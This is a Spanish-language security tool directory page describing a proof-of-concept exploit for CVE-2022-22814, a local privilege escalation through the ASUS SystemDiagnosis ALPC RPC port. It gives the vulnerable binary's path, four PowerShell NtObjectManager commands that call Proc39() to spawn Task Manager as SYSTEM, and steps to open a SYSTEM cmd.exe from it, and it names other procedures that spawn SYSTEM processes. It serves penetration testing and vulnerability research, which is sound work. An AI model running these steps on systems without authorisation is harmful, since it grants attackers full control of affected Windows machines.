Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-22814_PoC — Exploit de prueba de concepto para CVE-2022-22814 que demuestra escalada de privilegios local en Windows a través de la interfaz vulnerable ASUS SystemDiagnosis ALPC RPC. | Kitploit
Herramientas/GitHubGitHub/dshankle/cve-2022-22814_poc
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónExplotación de Binarios
GitHubdshankle/cve-2022-22814_poc

CVE-2022-22814_PoC

Exploit de prueba de concepto para CVE-2022-22814 que demuestra escalada de privilegios local en Windows a través de la interfaz vulnerable ASUS SystemDiagnosis ALPC RPC.

Ver Repositorio
3hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Escalada de Privilegios - AsusSystemDiagnosis.exe - Proc39()

Ruta completa: C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_d385bdc0d33d66f9\ASUSSystemDiagnosis\AsusSystemDiagnosis.exe

Problema:

El puerto ALPC \RPC Control\ASHWTestServer, expuesto por AsusSystemDiagnosis.exe, es totalmente accesible para cualquier usuario. Llamar a Proc39() a través de RPC mediante este puerto genera un proceso taskmgr.exe como SYSTEM en la sesión del usuario actual.

Explotación:

Utilizando la herramienta RPC NtObjectManager de Project Zero desde https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools (asegúrate de usar la versión compilada) se puede conectar al puerto RPC vulnerable, momento en el cual se puede llamar a Proc39(). Una vez que se genera el proceso taskmgr.exe como SYSTEM, se puede crear un shell cmd.exe utilizando la funcionalidad "Ejecutar nueva tarea" a través del menú contextual, Archivo > Ejecutar nueva tarea > cmd.exe.

NtObjectManager:

$server = get-rpcserver C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_d385bdc0d33d66f9\ASUSSystemDiagnosis\AsusSystemDiagnosis.exe

$client = get-rpcclient $server

$client.connect()

$client.Proc39()

Escalada de Privilegios - AsusSystemDiagnosis.exe - Proc40()

Igual que el anterior pero genera mmc.exe como SYSTEM. Se puede crear una nueva tarea o usar la funcionalidad de exploración para abrir una ventana de explorer.exe y ejecutar cmd.exe desde la barra de direcciones.

Notas adicionales:

Proc53() - genera systemreset.exe como SYSTEM Proc54() - genera RecoveryDrive.exe como SYSTEM

Descargar herramienta